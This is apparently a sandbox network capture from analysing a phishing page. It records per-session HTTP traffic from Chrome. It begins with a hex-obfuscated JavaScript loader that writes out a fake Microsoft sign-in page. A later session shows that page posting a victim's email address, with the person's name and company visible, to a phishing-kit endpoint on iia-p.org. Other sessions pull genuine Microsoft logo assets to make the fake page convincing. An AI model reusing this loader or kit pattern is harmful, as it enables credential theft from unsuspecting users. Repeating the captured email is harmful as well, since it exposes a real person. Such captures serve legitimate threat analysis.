_0x6b29=["\x25\x33\x43\x73\x63\x72\x69\x70\x74\x25\x32\x30\x6c\x61\x6e\x67\x75\x61\x67\x65\x25\x33\x44\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x25\x33\x45\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\x75\x6e\x65\x73\x63\x61\x70\x65\x28\
2024-04-26 04:28:07 UTC	8000	IN	Data Raw: 32 5c 78 33 35 5c 78 33 33 5c 78 34 31 5c 78 32 35 5c 78 33 32 5c 78 33 35 5c 78 33 32 5c 78 33 30 5c 78 36 33 5c 78 36 66 5c 78 37 36 5c 78 36 35 5c 78 37 32 5c 78 32 35 5c 78 33 32 5c 78 33 35 5c 78 33 33 5c 78 34 32 5c 78 32 35 5c 78 33 32 5c 78 33 35 5c 78 33 30 5c 78 34 31 5c 78 32 35 5c 78 33 32 5c 78 33 35 5c 78 33 32 5c 78 33 30 5c 78 32 35 5c 78 33 32 5c 78 33 35 5c 78 33 32 5c 78 33 30 5c 78 37 30 5c 78 36 66 5c 78 37 33 5c 78 36 39 5c 78 37 34 5c 78 36 39 5c 78 36 66 5c 78 36 65 5c 78 32 35 5c 78 33 32 5c 78 33 35 5c 78 33 33 5c 78 34 31 5c 78 32 35 5c 78 33 32 5c 78 33 35 5c 78 33 32 5c 78 33 30 5c 78 36 36 5c 78 36 39 5c 78 37 38 5c 78 36 35 5c 78 36 34 5c 78 32 35 5c 78 33 32 5c 78 33 35 5c 78 33 33 5c 78 34 32 5c 78 32 35 5c 78 33 32 5c 78 Data Ascii: 2\x35\x33\x41\x25\x32\x35\x32\x30\x63\x6f\x76\x65\x72\x25\x32\x35\x33\x42\x25\x32\x35\x30\x41\x25\x32\x35\x32\x30\x25\x32\x35\x32\x30\x70\x6f\x73\x69\x74\x69\x6f\x6e\x25\x32\x35\x33\x41\x25\x32\x35\x32\x30\x66\x69\x78\x65\x64\x25\x32\x35\x33\x42\x25\x32\x
2024-04-26 04:28:07 UTC	8000	IN	Data Raw: 32 5c 78 33 35 5c 78 33 32 5c 78 33 30 5c 78 32 35 5c 78 33 32 5c 78 33 35 5c 78 33 32 5c 78 33 30 5c 78 36 36 5c 78 36 66 5c 78 36 65 5c 78 37 34 5c 78 32 64 5c 78 36 36 5c 78 36 31 5c 78 36 64 5c 78 36 39 5c 78 36 63 5c 78 37 39 5c 78 32 35 5c 78 33 32 5c 78 33 35 5c 78 33 33 5c 78 34 31 5c 78 32 35 5c 78 33 32 5c 78 33 35 5c 78 33 32 5c 78 33 30 5c 78 32 35 5c 78 33 32 5c 78 33 35 5c 78 33 32 5c 78 33 32 5c 78 35 33 5c 78 36 35 5c 78 36 37 5c 78 36 66 5c 78 36 35 5c 78 32 35 5c 78 33 32 5c 78 33 35 5c 78 33 32 5c 78 33 30 5c 78 35 35 5c 78 34 39 5c 78 32 35 5c 78 33 32 5c 78 33 35 5c 78 33 32 5c 78 33 30 5c 78 35 37 5c 78 36 35 5c 78 36 32 5c 78 36 36 5c 78 36 66 5c 78 36 65 5c 78 37 34 5c 78 32 35 5c 78 33 32 5c 78 33 35 5c 78 33 32 5c 78 33 32 5c 78 Data Ascii: 2\x35\x32\x30\x25\x32\x35\x32\x30\x66\x6f\x6e\x74\x2d\x66\x61\x6d\x69\x6c\x79\x25\x32\x35\x33\x41\x25\x32\x35\x32\x30\x25\x32\x35\x32\x32\x53\x65\x67\x6f\x65\x25\x32\x35\x32\x30\x55\x49\x25\x32\x35\x32\x30\x57\x65\x62\x66\x6f\x6e\x74\x25\x32\x35\x32\x32\x
2024-04-26 04:28:07 UTC	8000	IN	Data Raw: 35 5c 78 33 32 5c 78 33 35 5c 78 33 30 5c 78 34 31 5c 78 32 35 5c 78 33 32 5c 78 33 35 5c 78 33 30 5c 78 34 31 5c 78 36 34 5c 78 36 39 5c 78 37 36 5c 78 32 35 5c 78 33 32 5c 78 33 35 5c 78 33 32 5c 78 33 30 5c 78 32 65 5c 78 36 32 5c 78 37 35 5c 78 37 34 5c 78 37 34 5c 78 36 66 5c 78 36 65 5c 78 32 35 5c 78 33 32 5c 78 33 35 5c 78 33 32 5c 78 33 30 5c 78 32 35 5c 78 33 32 5c 78 33 35 5c 78 33 37 5c 78 34 32 5c 78 32 35 5c 78 33 32 5c 78 33 35 5c 78 33 30 5c 78 34 31 5c 78 32 35 5c 78 33 32 5c 78 33 35 5c 78 33 30 5c 78 33 39 5c 78 37 30 5c 78 36 31 5c 78 36 34 5c 78 36 34 5c 78 36 39 5c 78 36 65 5c 78 36 37 5c 78 32 35 5c 78 33 32 5c 78 33 35 5c 78 33 33 5c 78 34 31 5c 78 32 35 5c 78 33 32 5c 78 33 35 5c 78 33 32 5c 78 33 30 5c 78 33 32 5c 78 33 30 5c 78 Data Ascii: 5\x32\x35\x30\x41\x25\x32\x35\x30\x41\x64\x69\x76\x25\x32\x35\x32\x30\x2e\x62\x75\x74\x74\x6f\x6e\x25\x32\x35\x32\x30\x25\x32\x35\x37\x42\x25\x32\x35\x30\x41\x25\x32\x35\x30\x39\x70\x61\x64\x64\x69\x6e\x67\x25\x32\x35\x33\x41\x25\x32\x35\x32\x30\x32\x30\x
2024-04-26 04:28:07 UTC	8000	IN	Data Raw: 33 5c 78 34 31 5c 78 32 35 5c 78 33 32 5c 78 33 35 5c 78 33 32 5c 78 33 30 5c 78 32 35 5c 78 33 32 5c 78 33 35 5c 78 33 32 5c 78 33 33 5c 78 36 33 5c 78 36 33 5c 78 36 33 5c 78 32 35 5c 78 33 32 5c 78 33 35 5c 78 33 33 5c 78 34 32 5c 78 32 35 5c 78 33 32 5c 78 33 35 5c 78 33 30 5c 78 34 31 5c 78 32 35 5c 78 33 32 5c 78 33 35 5c 78 33 32 5c 78 33 30 5c 78 32 35 5c 78 33 32 5c 78 33 35 5c 78 33 32 5c 78 33 30 5c 78 32 35 5c 78 33 32 5c 78 33 35 5c 78 33 32 5c 78 33 30 5c 78 32 35 5c 78 33 32 5c 78 33 35 5c 78 33 32 5c 78 33 30 5c 78 37 34 5c 78 36 35 5c 78 37 38 5c 78 37 34 5c 78 32 64 5c 78 36 34 5c 78 36 35 5c 78 36 33 5c 78 36 66 5c 78 37 32 5c 78 36 31 5c 78 37 34 5c 78 36 39 5c 78 36 66 5c 78 36 65 5c 78 32 35 5c 78 33 32 5c 78 33 35 5c 78 33 33 5c 78 Data Ascii: 3\x41\x25\x32\x35\x32\x30\x25\x32\x35\x32\x33\x63\x63\x63\x25\x32\x35\x33\x42\x25\x32\x35\x30\x41\x25\x32\x35\x32\x30\x25\x32\x35\x32\x30\x25\x32\x35\x32\x30\x25\x32\x35\x32\x30\x74\x65\x78\x74\x2d\x64\x65\x63\x6f\x72\x61\x74\x69\x6f\x6e\x25\x32\x35\x33\x
2024-04-26 04:28:07 UTC	8000	IN	Data Raw: 32 5c 78 33 30 5c 78 36 39 5c 78 36 65 5c 78 37 34 5c 78 36 35 5c 78 36 37 5c 78 37 32 5c 78 36 39 5c 78 37 34 5c 78 37 39 5c 78 32 35 5c 78 33 33 5c 78 34 34 5c 78 32 35 5c 78 33 32 5c 78 33 32 5c 78 37 33 5c 78 36 38 5c 78 36 31 5c 78 33 33 5c 78 33 38 5c 78 33 34 5c 78 32 64 5c 78 33 38 5c 78 36 39 5c 78 35 30 5c 78 35 34 5c 78 36 62 5c 78 33 32 5c 78 37 33 5c 78 32 35 5c 78 33 32 5c 78 34 36 5c 78 36 61 5c 78 34 64 5c 78 35 36 5c 78 36 61 5c 78 33 38 5c 78 33 31 5c 78 36 34 5c 78 36 65 5c 78 37 61 5c 78 36 32 5c 78 32 35 5c 78 33 32 5c 78 34 36 5c 78 36 39 5c 78 34 36 5c 78 35 32 5c 78 33 32 5c 78 37 33 5c 78 36 34 5c 78 34 31 5c 78 33 37 5c 78 37 35 5c 78 33 30 5c 78 33 36 5c 78 37 36 5c 78 34 38 5c 78 34 61 5c 78 37 39 5c 78 37 39 5c 78 34 63 5c 78 Data Ascii: 2\x30\x69\x6e\x74\x65\x67\x72\x69\x74\x79\x25\x33\x44\x25\x32\x32\x73\x68\x61\x33\x38\x34\x2d\x38\x69\x50\x54\x6b\x32\x73\x25\x32\x46\x6a\x4d\x56\x6a\x38\x31\x64\x6e\x7a\x62\x25\x32\x46\x69\x46\x52\x32\x73\x64\x41\x37\x75\x30\x36\x76\x48\x4a\x79\x79\x4c\x
2024-04-26 04:28:07 UTC	8000	IN	Data Raw: 32 5c 78 33 30 5c 78 37 37 5c 78 36 39 5c 78 36 34 5c 78 37 34 5c 78 36 38 5c 78 32 35 5c 78 33 33 5c 78 34 34 5c 78 32 35 5c 78 33 32 5c 78 33 32 5c 78 33 31 5c 78 33 30 5c 78 33 38 5c 78 32 35 5c 78 33 32 5c 78 33 32 5c 78 32 35 5c 78 33 32 5c 78 33 30 5c 78 36 38 5c 78 36 35 5c 78 36 39 5c 78 36 37 5c 78 36 38 5c 78 37 34 5c 78 32 35 5c 78 33 33 5c 78 34 34 5c 78 32 35 5c 78 33 32 5c 78 33 32 5c 78 33 32 5c 78 33 34 5c 78 32 35 5c 78 33 32 5c 78 33 32 5c 78 32 35 5c 78 33 32 5c 78 33 30 5c 78 37 33 5c 78 37 32 5c 78 36 33 5c 78 32 35 5c 78 33 33 5c 78 34 34 5c 78 32 35 5c 78 33 32 5c 78 33 32 5c 78 32 37 5c 78 32 35 5c 78 33 32 5c 78 34 32 5c 78 36 39 5c 78 32 65 5c 78 36 63 5c 78 36 66 5c 78 36 37 5c 78 36 66 5c 78 35 66 5c 78 36 39 5c 78 36 64 5c 78 Data Ascii: 2\x30\x77\x69\x64\x74\x68\x25\x33\x44\x25\x32\x32\x31\x30\x38\x25\x32\x32\x25\x32\x30\x68\x65\x69\x67\x68\x74\x25\x33\x44\x25\x32\x32\x32\x34\x25\x32\x32\x25\x32\x30\x73\x72\x63\x25\x33\x44\x25\x32\x32\x27\x25\x32\x42\x69\x2e\x6c\x6f\x67\x6f\x5f\x69\x6d\x
2024-04-26 04:28:07 UTC	8000	IN	Data Raw: 30 5c 78 32 35 5c 78 33 37 5c 78 34 32 5c 78 32 35 5c 78 33 37 5c 78 34 34 5c 78 32 35 5c 78 33 33 5c 78 34 32 5c 78 32 35 5c 78 33 30 5c 78 34 31 5c 78 32 35 5c 78 33 32 5c 78 33 30 5c 78 32 35 5c 78 33 32 5c 78 33 30 5c 78 32 35 5c 78 33 32 5c 78 33 30 5c 78 32 35 5c 78 33 32 5c 78 33 30 5c 78 32 35 5c 78 33 32 5c 78 33 30 5c 78 32 35 5c 78 33 32 5c 78 33 30 5c 78 32 35 5c 78 33 32 5c 78 33 30 5c 78 32 35 5c 78 33 32 5c 78 33 30 5c 78 32 35 5c 78 33 32 5c 78 33 30 5c 78 32 35 5c 78 33 32 5c 78 33 30 5c 78 32 35 5c 78 33 32 5c 78 33 30 5c 78 32 35 5c 78 33 32 5c 78 33 30 5c 78 37 36 5c 78 36 31 5c 78 37 32 5c 78 32 35 5c 78 33 32 5c 78 33 30 5c 78 37 30 5c 78 36 31 5c 78 37 32 5c 78 37 34 5c 78 37 33 5c 78 32 35 5c 78 33 32 5c 78 33 30 5c 78 32 35 5c 78 Data Ascii: 0\x25\x37\x42\x25\x37\x44\x25\x33\x42\x25\x30\x41\x25\x32\x30\x25\x32\x30\x25\x32\x30\x25\x32\x30\x25\x32\x30\x25\x32\x30\x25\x32\x30\x25\x32\x30\x25\x32\x30\x25\x32\x30\x25\x32\x30\x25\x32\x30\x76\x61\x72\x25\x32\x30\x70\x61\x72\x74\x73\x25\x32\x30\x25\x
2024-04-26 04:28:07 UTC	8000	IN	Data Raw: 35 5c 78 36 65 5c 78 37 34 5c 78 32 65 5c 78 36 63 5c 78 36 66 5c 78 36 33 5c 78 36 31 5c 78 37 34 5c 78 36 39 5c 78 36 66 5c 78 36 65 5c 78 32 65 5c 78 37 32 5c 78 36 35 5c 78 37 30 5c 78 36 63 5c 78 36 31 5c 78 36 33 5c 78 36 35 5c 78 32 38 5c 78 32 35 5c 78 33 32 5c 78 33 32 5c 78 36 38 5c 78 37 34 5c 78 37 34 5c 78 37 30 5c 78 32 35 5c 78 33 33 5c 78 34 31 5c 78 32 35 5c 78 33 32 5c 78 34 36 5c 78 32 35 5c 78 33 32 5c 78 34 36 5c 78 36 66 5c 78 37 35 5c 78 37 34 5c 78 36 63 5c 78 36 66 5c 78 36 66 5c 78 36 62 5c 78 32 65 5c 78 36 66 5c 78 36 36 5c 78 36 36 5c 78 36 39 5c 78 36 33 5c 78 36 35 5c 78 32 65 5c 78 36 33 5c 78 36 66 5c 78 36 64 5c 78 32 35 5c 78 33 32 5c 78 33 32 5c 78 32 39 5c 78 32 35 5c 78 33 33 5c 78 34 32 5c 78 32 35 5c 78 33 30 5c 78 Data Ascii: 5\x6e\x74\x2e\x6c\x6f\x63\x61\x74\x69\x6f\x6e\x2e\x72\x65\x70\x6c\x61\x63\x65\x28\x25\x32\x32\x68\x74\x74\x70\x25\x33\x41\x25\x32\x46\x25\x32\x46\x6f\x75\x74\x6c\x6f\x6f\x6b\x2e\x6f\x66\x66\x69\x63\x65\x2e\x63\x6f\x6d\x25\x32\x32\x29\x25\x33\x42\x25\x30\x
2024-04-26 04:28:07 UTC	8000	IN	Data Raw: 30 5c 78 32 35 5c 78 33 32 5c 78 33 30 5c 78 32 35 5c 78 33 32 5c 78 33 30 5c 78 32 35 5c 78 33 32 5c 78 33 30 5c 78 32 35 5c 78 33 32 5c 78 33 30 5c 78 32 35 5c 78 33 32 5c 78 33 30 5c 78 32 35 5c 78 33 32 5c 78 33 30 5c 78 32 35 5c 78 33 32 5c 78 33 30 5c 78 36 39 5c 78 36 36 5c 78 32 38 5c 78 36 35 5c 78 36 64 5c 78 36 31 5c 78 36 39 5c 78 36 63 5c 78 37 61 5c 78 32 35 5c 78 33 32 5c 78 33 30 5c 78 32 31 5c 78 32 35 5c 78 33 33 5c 78 34 34 5c 78 32 35 5c 78 33 33 5c 78 34 34 5c 78 32 35 5c 78 33 32 5c 78 33 30 5c 78 32 35 5c 78 33 32 5c 78 33 32 5c 78 32 35 5c 78 33 32 5c 78 33 32 5c 78 32 39 5c 78 32 35 5c 78 33 37 5c 78 34 32 5c 78 32 35 5c 78 33 30 5c 78 34 31 5c 78 32 35 5c 78 33 32 5c 78 33 30 5c 78 32 35 5c 78 33 32 5c 78 33 30 5c 78 32 35 5c 78 Data Ascii: 0\x25\x32\x30\x25\x32\x30\x25\x32\x30\x25\x32\x30\x25\x32\x30\x25\x32\x30\x25\x32\x30\x69\x66\x28\x65\x6d\x61\x69\x6c\x7a\x25\x32\x30\x21\x25\x33\x44\x25\x33\x44\x25\x32\x30\x25\x32\x32\x25\x32\x32\x29\x25\x37\x42\x25\x30\x41\x25\x32\x30\x25\x32\x30\x25\x

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49742	192.232.216.145	443	5352	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 04:28:09 UTC	580	OUT	POST /lh/brand.php HTTP/1.1 Host: iia-p.org Connection: keep-alive Content-Length: 49 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Accept: / Content-Type: application/x-www-form-urlencoded; charset=UTF-8 sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-26 04:28:09 UTC	49	OUT	Data Raw: 65 6d 61 69 6c 3d 73 75 7a 61 6e 6e 61 2e 73 69 6d 6f 6e 6f 76 69 63 25 34 30 6a 6a 73 77 61 73 74 65 2e 63 6f 6d 2e 61 75 26 62 61 72 6e 64 3d 31 Data Ascii: email=suzanna.simonovic%40jjswaste.com.au&barnd=1
2024-04-26 04:28:11 UTC	299	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 04:28:10 GMT Server: Apache Access-Control-Allow-Origin: * Upgrade: h2,h2c Connection: Upgrade Cache-Control: max-age=0 Expires: Fri, 26 Apr 2024 04:28:10 GMT Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2024-04-26 04:28:11 UTC	46	IN	Data Raw: 32 33 0d 0a 7b 22 6c 6f 67 6f 5f 69 6d 61 67 65 22 3a 6e 75 6c 6c 2c 22 62 67 5f 69 6d 61 67 65 22 3a 6e 75 6c 6c 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 23{"logo_image":null,"bg_image":null}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49743	13.107.213.41	443	5352	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 04:28:09 UTC	620	OUT	GET /shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg HTTP/1.1 Host: logincdn.msauth.net Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-26 04:28:10 UTC	780	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 04:28:10 GMT Content-Type: image/svg+xml Content-Length: 1435 Connection: close Cache-Control: public, max-age=31536000 Content-Encoding: gzip Last-Modified: Wed, 22 Jan 2020 00:38:07 GMT ETag: 0x8D79ED359808AB6 x-ms-request-id: 5c5303ab-401e-0036-5e92-973e83000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20240426T042810Z-1865489d5f49lr4x8x178u34an00000008hg000000000zw1 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-04-26 04:28:10 UTC	1435	IN	Data Raw: 1f 8b 08 00 00 00 00 00 04 00 bd 57 4d 6f 1c 37 0c fd 2b 8b ed 75 56 96 48 4a a2 0a db 80 7b f2 c1 be fa 90 db b6 b1 b3 06 ec 26 88 17 76 fa ef fb 28 51 b3 46 91 a2 c9 a5 b0 f7 61 57 1c 51 fc 7c e2 9c bf bc 7e da 7c 7b 7e fa f3 e5 62 7b 38 1e bf fc 7a 76 f6 f6 f6 16 de 38 7c fe fa e9 8c 62 8c 67 78 62 bb 79 7b fc 78 3c 5c 6c 53 d4 ed e6 70 ff f8 e9 70 bc d8 92 6c 37 af 8f f7 6f bf 7d fe 76 b1 8d 9b b8 81 74 83 c5 cb f3 e3 e3 f1 e9 fe 72 ff f2 72 7f 7c 39 3f 1b bf ce bf ec 8f 87 cd c7 8b ed ad 48 50 2e 8b 84 72 97 34 c8 61 47 41 ee 6a c8 ca d7 82 af 37 ac 21 a5 b6 98 ec 9a 4b c8 9c 6e 98 42 12 5a fa 43 87 5d 88 d4 fa d6 6b 6a a1 dd 41 d1 81 83 70 b9 e1 1a 78 49 a6 fe 10 62 d6 1b 49 21 4b b6 93 3e 3c d3 92 42 94 b6 4f 81 8a 2e 03 23 fe d2 12 24 b5 5d 68 a5 Data Ascii: WMo7+uVHJ{&v(QFaWQ\|~\|{~b{8zv8\|bgxby{x<\lSppl7o}vtrr\|9?HP.r4aGAj7!KnBZC]kjApxIbI!K><BO.#$]h

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49744	13.107.213.41	443	5352	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 04:28:09 UTC	619	OUT	GET /shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg HTTP/1.1 Host: logincdn.msauth.net Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-26 04:28:10 UTC	786	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 04:28:10 GMT Content-Type: image/svg+xml Content-Length: 673 Connection: close Cache-Control: public, max-age=31536000 Content-Encoding: gzip Last-Modified: Wed, 12 Feb 2020 22:01:56 GMT ETag: 0x8D7B0072D292595 x-ms-request-id: d3544974-801e-0006-3092-971f92000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20240426T042810Z-1865489d5f44crzvr9btg9hunn0000000azg000000003xmq x-fd-int-roxy-purgeid: 67912908 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-04-26 04:28:10 UTC	673	IN	Data Raw: 1f 8b 08 00 00 00 00 00 04 00 b5 55 db 6e db 30 0c fd 15 c1 7d 69 1e ac 50 b2 ae 43 1c a0 37 6c 2f c3 0a 64 fd 80 d4 b1 13 03 ae 1d d8 6e d3 f6 eb 47 ca f6 96 0c 79 6c 10 20 e6 91 45 f2 f0 98 94 16 dd db 96 bd bf 54 75 97 46 bb be df 7f 9b cf 0f 87 03 3f 24 bc 69 b7 73 09 00 73 dc 11 b1 43 b9 e9 77 69 24 bc 84 88 ed f2 72 bb eb 11 81 43 54 94 55 95 46 75 53 e7 d1 72 b1 65 cd 7e 9d 95 fd 47 1a 71 19 b1 ac 2a f7 f1 7e 4d ae af 6d 75 7d f5 30 c3 3d 84 d9 26 8d 7e 0a 65 0c 57 4c 58 af b9 cc bc 06 9e 58 06 88 25 70 17 1b 69 b9 96 13 12 0a 04 37 2b a9 84 e1 d6 c6 02 c0 b1 c1 3f d8 b1 d4 0a cd c4 01 57 4e 0e 88 25 3e e1 a6 b3 16 d7 24 ed a6 08 63 bc 11 7d 4e f4 03 bb 9b 59 34 3f a2 97 78 c5 31 bf 13 9a 9b cc 2a c3 b5 23 76 89 16 c8 47 61 6c 39 01 21 02 39 81 41 Data Ascii: Un0}iPC7l/dnGyl ETuF?$issCwi$rCTUFuSre~Gq~Mmu}0=&~eWLXX%pi7+?WN%>$c}NY4?x1#vGal9!9A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49745	13.107.213.41	443	5352	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 04:28:11 UTC	576	OUT	GET /16.000.28595.2/images/favicon.ico HTTP/1.1 Host: logincdn.msauth.net Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-26 04:28:11 UTC	746	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 04:28:11 GMT Content-Type: image/x-icon Content-Length: 17174 Connection: close Cache-Control: public, max-age=31536000 Last-Modified: Fri, 08 May 2020 12:39:06 GMT ETag: 0x8D7F34CCC610677 x-ms-request-id: 5ecc4e7e-501e-0057-2d92-9757a3000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20240426T042811Z-1865489d5f42v7z23dxn2r65v40000000ax0000000007922 x-fd-int-roxy-purgeid: 67912908 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-04-26 04:28:11 UTC	15638	IN	Data Raw: 00 00 01 00 06 00 80 80 10 00 00 00 00 00 68 28 00 00 66 00 00 00 48 48 10 00 00 00 00 00 e8 0d 00 00 ce 28 00 00 30 30 10 00 00 00 00 00 68 06 00 00 b6 36 00 00 20 20 10 00 00 00 00 00 e8 02 00 00 1e 3d 00 00 18 18 10 00 00 00 00 00 e8 01 00 00 06 40 00 00 10 10 10 00 00 00 00 00 28 01 00 00 ee 41 00 00 28 00 00 00 80 00 00 00 00 01 00 00 01 00 04 00 00 00 00 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 ef a4 00 00 00 b9 ff 00 00 ba 7f 00 22 50 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 Data Ascii: h(fHH(00h6 =@(A(("P"""""""""""""""""""""""""""""" 333333333333333
2024-04-26 04:28:11 UTC	1536	IN	Data Raw: 00 00 01 80 00 00 00 00 28 00 00 00 20 00 00 00 40 00 00 00 01 00 04 00 00 00 00 00 80 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 ef a4 00 00 00 b9 ff 00 00 bc 7b 00 1f 4c f9 00 22 50 f2 00 f7 a6 00 00 00 ba 7f 00 f3 a6 00 00 1e 4e f6 00 23 4e f4 00 f3 a4 00 00 00 bc 7d 00 00 ba 7d 00 00 00 00 00 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 Data Ascii: ( @{L"PN#N}}"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""333333

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49748	13.107.213.41	443	5352	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 04:28:11 UTC	420	OUT	GET /shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg HTTP/1.1 Host: logincdn.msauth.net Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-26 04:28:11 UTC	779	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 04:28:11 GMT Content-Type: image/svg+xml Content-Length: 1435 Connection: close Cache-Control: public, max-age=31536000 Content-Encoding: gzip Last-Modified: Wed, 22 Jan 2020 00:38:07 GMT ETag: 0x8D79ED359808AB6 x-ms-request-id: 5c5303ab-401e-0036-5e92-973e83000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20240426T042811Z-1865489d5f49lr4x8x178u34an00000008c000000000znv1 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
